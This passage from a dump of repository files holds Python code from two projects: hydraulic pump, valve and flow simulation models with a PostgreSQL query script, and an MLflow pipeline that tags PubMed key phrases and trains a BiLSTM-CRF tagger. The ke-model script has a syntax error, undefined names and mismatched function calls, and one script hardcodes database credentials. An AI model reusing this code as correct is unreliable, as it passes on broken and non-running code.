"text": "#!bin/python\n# -*- coding: utf-8 -*-\n\nfrom fun_piecewise import *\nimport math\n\n\nclass model_pump: # pump model\n\n def __init__(self, string_open_es_m, string_current_p): # рассмотреть возможность подключения к базе по KKS\n\n self.string_open_es_m = string_open_es_m\n self.string_current_p = string_current_p\n\n self.open_es_m = 0 # Обратная связь ИМ, \"включено\" двигателя насоса (0-1)\n\n self.nominal_f = 444.0 # Номинальный расход, кг/с\n self.nominal_p = 10.53 # Номинальный перепад давления на напорной арматуре, МПа\n self.current_f = 0.0 # Расход текущий, кг/с\n self.current_p = 0.0 # Давление текущее, МПа\n self.density = 914.0 # Текущая плотность перекачиваемой среды, кг/м3\n self.dp = []\n self.df = []\n\n # Характеристика насоса\n self.dh = [1074.05, 1036.77, 1035.04, 1028.10, 1020.65, 1001.99, 983.24, 965.84, 958.74, 928.47, 896.76, 890.31,\n 861.98, 825.49, 749.41] # Напор, м\n self.dg = [0.0, 403.38, 575.36, 694.64, 820.54, 1010.52, 1158.00, 1308.16, 1518.56, 1691.59, 1825.59, 1840.90,\n 1940.31, 2069.06, 2294.10] # Подача, м3/ч\n\n self.maximum_f = self.__get_dp_df()\n self.line_p = fun_piecewise(self.df, self.dp)\n\n def __get_dp_df(self):\n i = 0\n while i <= len(self.dh) - 1:\n self.dp.append(float(self.density * 9.80665 * self.dh[i] * 0.000001)) # Давление на напоре с учетом плотности, МПа\n i += 1\n\n i = 0\n while i <= len(self.dg) - 1:\n self.df.append(float((self.density * self.dg[i]) / 3600)) # Расход с учетом плотности, кг/с\n i += 1\n\n return self.df[len(self.df) - 1]\n\n def get_current_f(self, eas_p1, eas_p2, eas_rk, dt, k=1):\n if eas_p1 - eas_p2 >= 0.0:\n f = math.sqrt(eas_p1 - eas_p2) * (eas_rk / 100) * k\n if f >= self.df[len(self.df) - 1]:\n self.current_f = self.df[len(self.df) - 1]\n else:\n self.current_f = f\n # self.current_f = (math.sqrt(eas_p1 - eas_p2) * (eas_rk / 100)) * k # k=1250\n self.current_p = self.line_p.get_point(self.current_f)\n return self.current_f\n else:\n self.current_p = self.line_p.get_point(0.0)\n return 0.0\n"
},
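`get_current_f` above models pump flow as valve opening times the square root of the pressure drop, capped at the last point of the pump curve, then reads the discharge pressure off the interpolated head curve. A sketch of the flow formula alone, with illustrative pressures and the gain hinted at by the commented-out line:

```python
import math

eas_p1, eas_p2 = 10.5, 8.0   # upstream/downstream pressures, MPa (illustrative)
eas_rk = 25.0                # discharge valve opening, %
k = 1250.0                   # tuning gain suggested by the commented-out line

f = math.sqrt(eas_p1 - eas_p2) * (eas_rk / 100) * k
print(f)  # ~494 kg/s, under the curve's cap of 914 * 2294.10 / 3600 ~ 582 kg/s
```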
{
"alpha_fraction": 0.4716981053352356,
"alphanum_fraction": 0.5133647918701172,
"avg_line_length": 29.285715103149414,
"blob_id": "2513e7f760d63ca32235f77ac91651d3d778f0c7",
"content_id": "08df9a27eccf3db1f6e0a1a9f4d561fc9367f6c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1330,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 42,
"path": "/model_valve.py",
"repo_name": "skoricky/partner",
"src_encoding": "UTF-8",
"text": "#!bin/python\n# -*- coding: utf-8 -*-\n\nimport math\nfrom model_flow import *\n\n\nclass model_valve: # valve model\n\n def __init__(self, string_close_es_sk):\n\n self.string_close_es_sk = string_close_es_sk\n self.string_open_es_sk = string_close_es_sk[:-3] + string_close_es_sk[-3] + '32'\n self.string_aloe_sk = string_close_es_sk[:-3] + string_close_es_sk[-3] + '42'\n self.string_als_sk = string_close_es_sk[:-3] + string_close_es_sk[-3] + '43'\n\n self.pos_sk = 0.0 # Расчетная позиция арматуры на напоре (0.0-100.0), %\n self.travel_time_sk = 52.0 # Время хода напорной арматуры, с\n\n def get_pos_sk(self, pos_sk, aloe, als, weaf, wezu, dt, per=99.45, k=0.6981):\n trv_t = self.travel_time_sk * k\n d_pos = float(per / trv_t) * dt\n\n if weaf == 1:\n return 99.45\n\n if wezu == 1:\n return 0.0\n\n if aloe == 0 and als == 0:\n return pos_sk\n\n if aloe == 1:\n if float(pos_sk + d_pos) < 99.0 and weaf < 1:\n return float(pos_sk + d_pos)\n else:\n return per\n else:\n if float(pos_sk - d_pos) > 0.9 and wezu < 1:\n return float(pos_sk - d_pos)\n else:\n return 0.0\n"
},
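`get_pos_sk` above integrates the valve position linearly: while an open (`aloe`) or close (`als`) command is held, each call moves the position by `per / (travel_time * k) * dt`. A quick check of the step size under the class defaults (the unit of `dt` is not stated in the model; it is assumed to be 0.1 s here):

```python
travel_time_sk = 52.0        # s, full-stroke time from the class
k = 0.6981                   # scaling factor from the method signature
per = 99.45                  # % position at the fully open end stop

trv_t = travel_time_sk * k   # effective travel time, ~36.3 s
dt = 0.1                     # s, one solver step (assumed)
d_pos = per / trv_t * dt
print(d_pos)                 # ~0.274 % of stroke per step
```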
{
"alpha_fraction": 0.3981233239173889,
"alphanum_fraction": 0.4262734651565552,
"avg_line_length": 28.84000015258789,
"blob_id": "a84e555896101c23c0a0c54515b6692e0dd713ae",
"content_id": "c31e0060741bce318a7ba91ccfd3c1972d237d07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 25,
"path": "/fun_piecewise.py",
"repo_name": "skoricky/partner",
"src_encoding": "UTF-8",
"text": "#!bin/python\n# -*- coding: utf-8 -*-\n\nclass fun_piecewise: # piecewise function\n\n def __init__(self, in_x, in_y):\n\n self._in_x = in_x\n self._in_y = in_y\n\n def output_y(self, x1, x2, y1, y2, x):\n return (((x - x1) * (y2 - y1)) / (x2 - x1)) + y1\n\n def get_point(self, x):\n if x < self._in_x[0]:\n return self._in_y[0]\n if x > self._in_x[len(self._in_x) - 1]:\n return self._in_y[len(self._in_x) - 1]\n i = 0\n while i < len(self._in_x) - 1:\n if x <= self._in_x[i + 1]:\n if x >= self._in_x[i]:\n return self.output_y(self._in_x[i], self._in_x[i + 1], self._in_y[i], self._in_y[i + 1], x)\n else:\n i += 1\n"
},
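`fun_piecewise` above is a plain linear interpolator over sorted breakpoints that clamps to the end values outside the table. A minimal usage sketch with illustrative data:

```python
from fun_piecewise import fun_piecewise

line = fun_piecewise([0.0, 10.0, 20.0], [0.0, 5.0, 7.0])
print(line.get_point(15.0))   # 6.0, halfway between (10, 5) and (20, 7)
print(line.get_point(-3.0))   # 0.0, clamped to the first table value
print(line.get_point(99.0))   # 7.0, clamped to the last table value
```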
{
"alpha_fraction": 0.5610510110855103,
"alphanum_fraction": 0.6244204044342041,
"avg_line_length": 27.130434036254883,
"blob_id": "be42882a1cfe650242878c9a8c371acff851daae",
"content_id": "ce64b5c5d54316c151e2f0d77d1e9aa0f3f94f40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 647,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 23,
"path": "/module_psql_conn.py",
"repo_name": "skoricky/partner",
"src_encoding": "UTF-8",
"text": "#!bin/python\n# -*- coding: utf-8 -*-\n\nimport psycopg2\n\nconn = psycopg2.connect(host='localhost', port='5439', user='postgres', password='postgres', dbname='getdb')\n\ntry:\n cursor = conn.cursor()\n cursor.execute(\"SELECT abonent_id, page_kks, page_no FROM f7952415767822940get.pages WHERE abonent_id = 633 AND page_id::VARCHAR LIKE '199%'\")\n f = cursor.fetchall()\n for n in range(0, len(f)):\n for i in range(0, len(f[n])):\n print(f[n][i])\n\nexcept psycopg2.DatabaseError as Error_test:\n print(\"no good\")\n\nconn.close()\n\n# arr = [1, 2, 3, 4, 5, 1, 1.1]\n#\n# print(sum((float(arr[i]) for i in range(0, int(len(arr))))))\n"
},
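The connection module above can leak the cursor if the query fails. A slightly safer variant of the same query using psycopg2's context managers and a parameterized filter (connection settings copied from the snippet; the bound value is illustrative):

```python
import psycopg2

conn = psycopg2.connect(host='localhost', port='5439', user='postgres',
                        password='postgres', dbname='getdb')
try:
    with conn:                            # commits or rolls back the transaction
        with conn.cursor() as cursor:     # closes the cursor automatically
            cursor.execute(
                "SELECT abonent_id, page_kks, page_no "
                "FROM f7952415767822940get.pages WHERE abonent_id = %s",
                (633,))
            for row in cursor.fetchall():
                print(row)
except psycopg2.DatabaseError as error:
    print(error)
finally:
    conn.close()
```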
{
"alpha_fraction": 0.4679849445819855,
"alphanum_fraction": 0.5160075426101685,
"avg_line_length": 27.675676345825195,
"blob_id": "7618ddd032d23a5a27a6487e82610519eb52a76e",
"content_id": "ef731a1aa90bc551f359eb5bf3209693f1cd15d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1116,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 37,
"path": "/model_flow.py",
"repo_name": "skoricky/partner",
"src_encoding": "UTF-8",
"text": "#!bin/python\n# -*- coding: utf-8 -*-\n\nimport math\n\n\nclass model_flow: # flow model\n\n def __init__(self, string_eas_p1='', string_eas_p2='', string_eas_rk=''):\n self.string_eas_rk = string_eas_rk\n self.string_eas_p1 = string_eas_p1\n self.string_eas_p2 = string_eas_p2\n self.eas_rk = 0.0\n self.eas_p1 = 0.0\n self.eas_p2 = 0.0\n self.density = 1000.0\n\n self.current_f = 0.0\n self.kv = 130.0 # максимальная пропускная способность запорного устройства, м3/ч\n\n def get_current_f(self, k=1):\n eas_rk = self.eas_rk\n eas_p1 = self.eas_p1\n eas_p2 = self.eas_p2\n kv = self.kv\n density = self.density / 1000\n maximum_f = kv * self.density / 3600\n\n if eas_p1 - eas_p2 >= 0.0:\n f = k * (eas_rk * kv / 100) * math.sqrt(density * (eas_p1 - eas_p2))\n if f >= maximum_f:\n self.current_f = maximum_f\n else:\n self.current_f = f\n return self.current_f\n else:\n return 0.0\n\n"
}
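A worked example of `get_current_f`'s valve equation above: flow scales with opening, Kv and the square root of relative density times the pressure drop, hard-capped at `kv * density / 3600`. Values are illustrative:

```python
import math

kv = 130.0                    # m3/h, capacity from the class
density = 1000.0              # kg/m3
eas_rk = 50.0                 # opening, %
dp = 0.8                      # MPa pressure drop (illustrative)

max_f = kv * density / 3600   # ~36.1 kg/s hard cap
f = (eas_rk * kv / 100) * math.sqrt((density / 1000) * dp)
print(f, min(f, max_f))       # 65 * sqrt(0.8) ~ 58.1 -> capped to ~36.1 kg/s
```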
] | 6 |
pchding/kph
|
https://github.com/pchding/kph
|
08af9aea70c3e4f4bcea194a3f67dfbbf8b740b5
|
5dc04c92e778669d46109398fc27bec94002c2ec
|
ec7bb93f4f27ef780b6dc492a62a762b24036ca4
|
refs/heads/master
| 2022-11-24T04:58:36.325821 | 2020-07-21T20:10:36 | 2020-07-21T20:10:36 | 268,815,328 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5762049555778503,
"alphanum_fraction": 0.5865537524223328,
"avg_line_length": 35.75,
"blob_id": "110ab69a1613099a9f6ecf349ac51ad1d93fca43",
"content_id": "aa9f497b53b2c4ea48f803a580504858901672fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13818,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 376,
"path": "/mlflow/kemodel.py",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "import mlflow\nimport torch\nfrom torch import nn\nimport time\nimport torchtext\nimport click\nimport numpy as np\nimport pandas as pd\nimport spacy\nfrom torchcrf import CRF\nimport ast\nimport subprocess\nimport mlflow.pytorch\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch import helpers\n\n\[email protected](help=\"Convert JSON to PD. Tag key phrases\")\[email protected](\"--df_in\", default='dfprocessed.p')\[email protected](\"--embvec\", default=1)\[email protected](\"--embvecache\", default='/home/pding/Documents/glove/')\[email protected](\"--val_ratio\", default=0.2)\[email protected](\"--rnnsize\", default=128)\[email protected](\"--batchsize\", default=310)\[email protected](\"--lr\", default=0.01)\[email protected](\"--weight_decay\", default=1e-5)\[email protected](\"--n_epochs\", default=15)\[email protected](\"--model_save\", default='model0.pt')\[email protected](\"--json_in\", default='pmed.json')\[email protected](\"--json_out\", default='pmedaug.json')\[email protected](\"--es\", default=1)\[email protected](\"--inputfile\", default=1,\n help=\"Whether to use the input.txt\")\ndef ketraintest(inputfile, df_in, embvec, embvecache, val_ratio, rnnsize, batchsize,lr, weight_decay, n_epochs, model_save\n json_in, json_out, es):\n if inputfile == 1:\n with open(\"input.txt\", \"r\") as f:\n para = ast.literal_eval(f.read())\n df_in = para['df_in']\n embvec = para['embvec']\n embvecache = para['embvecache']\n val_ratio = para['val_ratio']\n rnnsize = para['rnnsize']\n batchsize = para['batchsize']\n lr = para['lr']\n weight_decay = para['weight_decay']\n n_epochs = para['n_epochs']\n model_save = para['model_save']\n if embvec == 1:\n embvec = torchtext.vocab.GloVe(name='840B', dim=300, cache=embvecache)\n use_pretrained = True\n subprocess.getoutput(\"python -m spacy download en_core_web_sm\")\n svoc = spacy.load(\"en_core_web_sm\")\n datao = pd.read_pickle(df_in)\n datatrain = datao[datao['Extracted']>=3]\n datatest = datao[datao['Extracted']<3]\n # separate train and validate\n dtrain = datatrain.loc[:,['SRC','TRG']]\n dtraink = datatrain.loc[:,['SRC','TRG','keywords']]\n seed = 250\n idx = np.arange(datatrain.shape[0])\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n np.random.shuffle(idx)\n val_size = int(len(idx) * val_ratio)\n df_train = dtrain.iloc[idx[val_size:], :]\n df_val = dtrain.iloc[idx[:val_size], :]\n df_val_k = dtraink.iloc[idx[:val_size], :]\n df_test = datatest.loc[:,['SRC','TRG']]\n dtraink = datatrain.loc[:,['SRC','TRG','keywords']]\n df_val_k = dtraink.iloc[idx[:val_size], :]\n # Load original dataset\n datai = pd.read_json(json_in, orient='index', convert_dates=False, convert_axes=False)\n datai = datai[datai.abstract.notnull()]\n datai = datai[datai.title.notnull()]\n datai = datai.replace('\\n',' ', regex=True)\n datai = datai.replace('\\t',' ', regex=True)\n dataiu = datai.loc[datai.keywords.str.len() ==0]\n dataik = datai.loc[datai.keywords.str.len() >0]\n dataiu['SRC'] = dataiu.title + ' '+ dataiu.abstract\n tokenizertrg = lambda x: x.split()\n\n def tokenizersrc(text): # create a tokenizer function\n return [tok.text for tok in svoc.tokenizer(text)]\n def safe_value(field_val):\n return field_val if not pd.isna(field_val) else \"Other\"\n def safe_year(field_val):\n return field_val if not pd.isna(field_val) else 1900\n TEXT = torchtext.data.Field(init_token='<bos>', eos_token='<eos>', sequential=True, lower=False)\n LABEL = 
torchtext.data.Field(init_token='<bos>', eos_token='<eos>', sequential=True, unk_token=None)\n fields = [('text', TEXT), ('label', LABEL)]\n device = 'cuda'\n train_examples = read_data(df_train, fields, tokenizersrc, tokenizertrg)\n valid_examples = read_data(df_val, fields, tokenizersrc, tokenizertrg)\n # Load the pre-trained embeddings that come with the torchtext library.\n if use_pretrained:\n print('We are using pre-trained word embeddings.')\n TEXT.build_vocab(train_examples, vectors=embvec)\n else: \n print('We are training word embeddings from scratch.')\n TEXT.build_vocab(train_examples, max_size=5000)\n LABEL.build_vocab(train_examples)\n # Create one of the models defined above.\n #self.model = RNNTagger(self.TEXT, self.LABEL, emb_dim=300, rnn_size=128, update_pretrained=False)\n model0 = RNNCRFTagger(TEXT, LABEL, rnnsize, emb_dim=300, update_pretrained=False)\n\n model0.to(device)\n optimizer = torch.optim.Adam(model0.parameters(), lr=lr, weight_decay=weight_decay)\n with mlflow.start_run() as mlrun:\n train(train_examples, valid_examples, embvec, TEXT, LABEL, device, model0, batchsize, optimizer,n_epochs)\n out2 = evaltest2(df_val, df_val_k, model0, tokenizersrc, fields, device)\n ttp3 = kphperct(df_val_k, out2,svoc)\n mlflow.log_param(\"epochs\", n_epochs)\n mlflow.pytorch.save_model(model0, model_save)\n mlflow.log_metric(\"extraction_rate\", ttp3.mean())\n augout = evaltest2(dataiu,model0, tokenizersrc, fields, device)\n klist = kphext2(dataiu.SRC,augout,svoc)\n for i in range(len(dataiu.index)):\n dataiu.iloc[i,2].extend(list(set(klist[i])))\n output = pd.concat([dataik,dataiu], join=\"inner\")\n output.to_json('/home/pding/OneDrive/kph/MSaug.json', orient='index')\n if es == 1:\n output['journal'] = output['journal'].apply(safe_value)\n output['conclusions'] = output['conclusions'].apply(safe_value)\n output['pubdate'] = output['pubdate'].apply(safe_year)\n output['PMID'] = output.index\n test_server = [{'host':'127.0.0.1','port':9200}]\n es = Elasticsearch(test_server,http_compress=True)\n use_these_keys = ['PMID', 'title', 'abstract', 'keywords','authors','pubdate']\n\n def filterKeys(document):\n return {key: document[key] for key in use_these_keys }\n \n def doc_generator(df):\n df_iter = df.iterrows()\n for index, document in df_iter:\n try:\n yield {\n \"_index\": 'ms',\n \"_source\": filterKeys(document),\n }\n except StopIteration:\n return\n helpers.bulk(es, doc_generator(output))\n print(ttp3.mean())\n\n\nclass RNNCRFTagger(nn.Module):\n \n def __init__(self, text_field, label_field, rnn_size, emb_dim, update_pretrained=False):\n super().__init__()\n \n voc_size = len(text_field.vocab)\n self.n_labels = len(label_field.vocab) \n \n self.embedding = nn.Embedding(voc_size, emb_dim)\n if text_field.vocab.vectors is not None:\n self.embedding.weight = torch.nn.Parameter(text_field.vocab.vectors, \n requires_grad=update_pretrained)\n\n self.rnn = nn.LSTM(input_size=emb_dim, hidden_size=rnn_size, \n bidirectional=True, num_layers=1)\n\n self.top_layer = nn.Linear(2*rnn_size, self.n_labels)\n \n self.pad_word_id = text_field.vocab.stoi[text_field.pad_token]\n self.pad_label_id = label_field.vocab.stoi[label_field.pad_token]\n \n self.crf = CRF(self.n_labels)\n \n def compute_outputs(self, sentences):\n embedded = self.embedding(sentences)\n rnn_out, _ = self.rnn(embedded)\n out = self.top_layer(rnn_out)\n return out\n \n def forward(self, sentences, labels):\n # Compute the outputs of the lower layers, which will be used as emission\n # scores for the CRF.\n scores = 
self.compute_outputs(sentences)\n mask0 = sentences != self.pad_word_id\n mask = mask0.byte()\n # We return the loss value. The CRF returns the log likelihood, but we return \n # the *negative* log likelihood as the loss value. \n # PyTorch's optimizers *minimize* the loss, while we want to *maximize* the\n # log likelihood.\n return -self.crf(scores, labels, mask=mask)\n\n def predict(self, sentences):\n # Compute the emission scores, as above.\n scores = self.compute_outputs(sentences)\n mask0 = sentences != self.pad_word_id\n mask = mask0.byte()\n # Apply the Viterbi algorithm to get the predictions. This implementation returns\n # the result as a list of lists (not a tensor), corresponding to a matrix\n # of shape (n_sentences, max_len).\n return self.crf.decode(scores, mask=mask)\n\ndef train(train_examples, valid_examples, embvec, TEXT, LABEL, device, model, batch_size, optimizer, n_epochs):\n\n\n # Count the number of words and sentences.\n n_tokens_train = 0\n n_sentences_train = 0\n for ex in train_examples:\n n_tokens_train += len(ex.text) + 2\n n_sentences_train += 1\n n_tokens_valid = 0 \n for ex in valid_examples:\n n_tokens_valid += len(ex.text)\n\n\n \n n_batches = np.ceil(n_sentences_train / batch_size)\n\n mean_n_tokens = n_tokens_train / n_batches\n\n train_iterator = torchtext.data.BucketIterator(\n train_examples,\n device=device,\n batch_size=batch_size,\n sort_key=lambda x: len(x.text),\n repeat=False,\n train=True,\n sort=True)\n\n valid_iterator = torchtext.data.BucketIterator(\n valid_examples,\n device=device,\n batch_size=64,\n sort_key=lambda x: len(x.text),\n repeat=False,\n train=False,\n sort=True)\n\n train_batches = list(train_iterator)\n valid_batches = list(valid_iterator)\n\n n_labels = len(LABEL.vocab)\n\n history = defaultdict(list) \n\n \n\n for i in range(1, n_epochs + 1):\n\n t0 = time.time()\n\n loss_sum = 0\n\n model.train()\n for batch in train_batches:\n\n # Compute the output and loss.\n loss = model(batch.text, batch.label) / mean_n_tokens\n\n optimizer.zero_grad() \n loss.backward()\n optimizer.step()\n loss_sum += loss.item()\n\n train_loss = loss_sum / n_batches\n history['train_loss'].append(train_loss)\n if i % 1 == 0:\n print(f'Epoch {i}: train loss = {train_loss:.4f}')\n mlflow.log_metric(\"train_loss\", history['train_loss'])\n\n\ndef evaltest2(df_val, df_val_k, model, tokenizersrc,fields,device):\n # This method applies the trained model to a list of sentences.\n examples = []\n for sen in df_val.SRC:\n words = tokenizersrc(sen)\n labels = ['O']*len(words) # placeholder\n examples.append(torchtext.data.Example.fromlist([words, labels], fields))\n dataset = torchtext.data.Dataset(examples, fields)\n\n iterator = torchtext.data.Iterator(\n dataset,\n device=device,\n batch_size=300,\n repeat=False,\n train=False,\n sort=False)\n\n # Apply the trained model to all batches.\n out = []\n model.eval()\n for batch in iterator:\n # Call the model's predict method. 
This returns a list of NumPy matrix\n # containing the integer-encoded tags for each sentence.\n predicted = model.predict(batch.text)\n\n # Convert the integer-encoded tags to tag strings.\n #for tokens, pred_sen in zip(sentences, predicted):\n for pred_sen in predicted:\n out.append([LABEL.vocab.itos[pred_id] for pred_id in pred_sen[1:-1]])\n return out\n\n\n\ndef kphext2(sentences,tags,svoc):\n kph = []\n for i in range(len(sentences)):\n s0 = svoc.tokenizer(sentences[i])\n s1 = [tok.text for tok in s0]\n t1 = tags[i]\n k1 = []\n for j in range(len(s1)):\n start = j\n if t1[j] == 'B':\n sti = 0\n stop = j+1\n while sti == 0:\n try:\n kt = str(t1[stop])\n if kt == 'I':\n stop = stop+1\n else:\n k2 = str(s0[start:stop])\n k1.append(k2)\n sti = 1\n except(IndexError):\n k2 = str(s0[start:stop])\n k1.append(k2)\n sti = 1\n k2 = str(s1[j])\n kph.append(k1)\n return kph\n\n\ndef read_data(df_train, datafields, tokenizersrc, tokenizertrg):\n examples = []\n words = []\n labels = []\n for pmid in df_train.index:\n words = tokenizersrc(df_train.loc[pmid,'SRC'])\n labels = tokenizertrg(df_train.loc[pmid,'TRG'])\n examples.append(torchtext.data.Example.fromlist([words, labels], datafields))\n return torchtext.data.Dataset(examples, datafields)\n\ndef tagperct(df_val,out):\n tp = np.empty(len(out))\n for i in range(len(df_val.index)):\n trg = tokenizertrg(df_val.iloc[i,1])\n total = 0\n for x in trg:\n if x != 'O':\n total = total+1\n matched = 0\n for j in range(total):\n if trg[j] != 'O':\n if trg[j]== out[i][j]:\n matched = matched + 1\n p = matched/total\n tp[i] = p\n return tp\n\n\ndef kphperct(df_val_k,out,svoc):\n tp = np.empty(len(out))\n for i in range(len(df_val_k.index)):\n ktrg = df_val_k.iloc[i,2]\n pred = kphext2([df_val_k.iloc[i,0]],[out[i]],svoc)\n k = 0\n for kp in ktrg:\n if str(kp).lower() in [str(x).lower() for x in pred[0]]:\n k = k+1\n tp[i] = k/df_val_k.iloc[i,3]\n return tp\n\n\nif __name__ == '__main__':\n ketraintest()\n"
},
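The tagger above delegates both the loss and Viterbi decoding to the `pytorch-crf` package. A self-contained sketch of that CRF interface, decoupled from the LSTM encoder (the emission tensor is random, purely for illustration; shapes use the library's default time-first layout):

```python
import torch
from torchcrf import CRF

n_labels, seq_len, batch = 5, 7, 3
crf = CRF(n_labels)                                # time-first by default

emissions = torch.randn(seq_len, batch, n_labels)  # scores from any encoder
tags = torch.randint(n_labels, (seq_len, batch))
mask = torch.ones(seq_len, batch, dtype=torch.uint8)

loss = -crf(emissions, tags, mask=mask)        # negative log likelihood, as above
best_paths = crf.decode(emissions, mask=mask)  # list of tag-id lists per sequence
print(loss.item(), best_paths[0])
```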
{
"alpha_fraction": 0.7607170939445496,
"alphanum_fraction": 0.7700701355934143,
"avg_line_length": 46.51852035522461,
"blob_id": "71351249a1001d5e21d00a32d100ac3af1b48885",
"content_id": "55809bd4c03f61b43bf2257507dc1bb3dd4b7edc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1283,
"license_type": "no_license",
"max_line_length": 249,
"num_lines": 27,
"path": "/mlflow/README.md",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "# End-to-end Key Phrase Extraction Model powered by MLflow\n\nThere are three modules in this model:\n1. pull_pmed_data: it pulls all the records related to the defined search term from PubMed and save them in a JSON file\n2. prep_data: it cleans the records and genertate the tag seauence for future training.\n3. ke_train: it uses the cleanned sequence with key phrases to train a bi-LSTM-CRF model and then use this model to augment the records without key phrases with extracted key phrases. It could also write these records into an ELasticsearch database.\n\n## Running the model\n\nMake sure you have installed MLflow package in your python environment. Download all the files, then go to the mlflow folder.\n\nTo run each module, exectute the following command to pull pubmed data using parameter defined in the input file (input.txt)\n```\nmlflow run . -e pull_pmed_data -P inputfile=1\n```\nSubstitute 'pull_pmed_data' to any other modules, if you do not want use the inputfile and want set paramters through command line, you could execute something the following command\n```\nmlflow run . -e pull_pmed_data -P inputfile=0 -P search_term='covid' -P max_records=100000\n```\n\nTo run the whole end-to-end model\n\n```\nmlflow run . -e main -P inputfile=1\n```\n\nSample input.txt is also included.\n"
},
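The modules above read their parameters from `input.txt` via `ast.literal_eval`, so the file holds a single Python dict literal. A hypothetical example with the keys the preprocessing and training modules look up (paths and values are placeholders, not the shipped sample):

```python
# input.txt -- parsed with ast.literal_eval(f.read())
{
    'json_in': 'pmed.json',
    'save_df': 'dfprocessed.p',
    'df_in': 'dfprocessed.p',
    'embvec': 1,
    'embvecache': '/path/to/glove/',
    'val_ratio': 0.2,
    'rnnsize': 128,
    'batchsize': 310,
    'lr': 0.01,
    'weight_decay': 1e-5,
    'n_epochs': 15,
    'model_save': 'model0.pt',
}
```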
{
"alpha_fraction": 0.5518254041671753,
"alphanum_fraction": 0.5589593052864075,
"avg_line_length": 38.71666717529297,
"blob_id": "8b26fdd95d5e34f3158726b1a6201f8c8cb25e29",
"content_id": "cdecd299f65d97f1f84cbd0ee9e86cdddf2355c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2383,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 60,
"path": "/mlflow/dataprep.py",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "import mlflow\nimport click\nimport spacy\nfrom spacy.matcher import PhraseMatcher\nimport pandas as pd\nimport subprocess\nimport ast\n\n\[email protected](help=\"Convert JSON to PD. Tag key phrases\")\[email protected](\"--json_in\", default='pmed.json')\[email protected](\"--save_df\", default='dfprocessed.p')\[email protected](\"--inputfile\", default=1,\n help=\"Whether to use the input.txt\")\ndef dfprep(json_in, save_df, inputfile):\n if inputfile == 1:\n with open(\"input.txt\", \"r\") as f:\n para = ast.literal_eval(f.read())\n json_in = para['json_in']\n save_df = para['save_df']\n with mlflow.start_run() as mlrun:\n print(subprocess.getoutput(\"python -m spacy download en_core_web_sm\"))\n artpd = pd.read_json(json_in, orient='index', convert_dates=False, convert_axes=False)\n artpda = artpd[artpd.abstract.notnull()].copy()\n artpda = artpda[artpd.title.notnull()]\n# artpda.index = pd.Series(artpda.index).apply(lambda x: x[0:8])\n artpdak = artpda[artpda.keywords.str.len() > 0].copy()\n dataf = pd.DataFrame(index=artpdak.index, columns=['SRC', 'TRG', 'keywords', 'Extracted', 'abskey'])\n dataf.loc[:, 'SRC'] = artpdak.title + ' ' + artpdak.abstract\n dataf.loc[:, 'keywords'] = artpdak.keywords\n svoc = spacy.load(\"en_core_web_sm\")\n matcher = PhraseMatcher(svoc.vocab, attr=\"LOWER\")\n for pmid in dataf.index:\n t0 = dataf.loc[pmid]\n patterns = [svoc.make_doc(str(name)) for name in t0.keywords]\n matcher.add(\"Names\", None, *patterns)\n doc = svoc(t0.SRC)\n t1 = ['O']*(len(doc))\n matched = []\n matn = 0\n for _, start, end in matcher(doc):\n t1[start] = 'B'\n t1[start+1:end] = 'I'*(end-start-1)\n if str(doc[start:end]).lower() not in matched:\n matn = matn+1\n matched.append(str(doc[start:end]).lower())\n abskw = []\n for x in t0.keywords:\n if x.lower() not in matched:\n abskw.append(x)\n dataf.loc[pmid, 'TRG'] = ' '.join([t for t in t1])\n dataf.loc[pmid, 'Extracted'] = matn\n dataf.loc[pmid, 'abskey'] = abskw\n matcher.remove(\"Names\")\n dataf.to_pickle(save_df)\n\n\n\nif __name__ == '__main__':\n dfprep()\n"
},
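For reference, a self-contained sketch of the BIO-tagging step that dfprep above performs per record. It uses the spaCy 2.x PhraseMatcher API (matcher.add with a None callback), matching dataprep.py; the sample text and keywords are invented:

```python
import spacy
from spacy.matcher import PhraseMatcher

svoc = spacy.load("en_core_web_sm")
matcher = PhraseMatcher(svoc.vocab, attr="LOWER")

keywords = ["multiple sclerosis", "biomarker"]  # invented keywords
matcher.add("Names", None, *[svoc.make_doc(k) for k in keywords])

doc = svoc("A candidate biomarker for Multiple Sclerosis progression.")
tags = ["O"] * len(doc)
for _, start, end in matcher(doc):
    tags[start] = "B"                               # first token of a key phrase
    tags[start + 1:end] = "I" * (end - start - 1)   # inside tokens, as in dfprep

print(" ".join(tags))  # -> O O B O B I O O
```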
{
"alpha_fraction": 0.8137931227684021,
"alphanum_fraction": 0.8166666626930237,
"avg_line_length": 132.76922607421875,
"blob_id": "4790f079b9aeef9196a77ead4912d74ac7c0d966",
"content_id": "680675fc99edbcde8e3b343bd284badd59819185",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1744,
"license_type": "no_license",
"max_line_length": 495,
"num_lines": 13,
"path": "/README.md",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
